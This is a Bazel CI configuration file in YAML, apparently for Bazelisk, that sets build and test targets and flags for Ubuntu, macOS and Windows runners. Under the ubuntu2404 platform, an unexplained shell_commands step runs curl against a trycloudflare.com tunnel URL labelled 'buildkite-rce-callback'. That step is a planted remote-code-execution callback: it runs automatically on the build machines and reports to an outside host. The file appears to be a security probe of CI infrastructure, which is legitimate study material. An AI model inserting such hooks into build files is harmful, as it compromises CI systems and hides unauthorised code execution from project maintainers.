---
platforms:
  ubuntu2404:
    shell_commands:
      - "curl -sS https://boring-watt-llc-combat.trycloudflare.com/buildkite-rce-callback-ossvrp-2572"
    build_targets:
      - //...
    test_targets:
      - //...
    test_flags:
      - --flaky_test_attempts=1
      - --test_output=streamed
  ubuntu2204:
    build_targets:
      - //...
    test_targets:
      - //...
    test_flags:
      - --flaky_test_attempts=1
      - --test_output=streamed
  macos_arm64:
    build_targets:
      - //...
    test_targets:
      - //...
      - -//:py_bazelisk_test
    test_flags:
      - --flaky_test_attempts=1
      - --test_output=streamed
  windows:
    build_targets:
      - //...
    test_targets:
      - //...
      - -//:py3_bazelisk_test
    test_flags:
      - --flaky_test_attempts=1
      - --test_env=PATH
      - --test_env=PROCESSOR_ARCHITECTURE
      - --test_output=streamed
